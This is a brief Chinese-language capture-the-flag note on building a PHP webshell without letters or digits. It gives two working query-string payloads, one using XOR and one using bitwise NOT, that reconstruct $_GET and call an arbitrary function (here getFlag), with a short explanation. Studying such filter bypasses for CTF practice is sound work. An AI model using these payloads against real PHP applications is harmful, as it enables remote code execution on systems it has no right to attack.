知识点
无字母数字websell
https://www.cnblogs.com/wangtanzhi/p/12251619.html
payload
index1:
?code=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=getFlag
index2:
?code=%24%7B%7E%22%A0%B8%BA%AB%22%7D%5B%AA%5D%28%29%3B&%aa=getFlag
取反方法:
在{}中执行了取反操作,所以${"xa0xb8xbaxab"}取反相当于$_GET。
函数拼接出了字符串$_GET'+';,然后传入+=getFlag,最后执行了函数getFlag();
查看源代码获得flag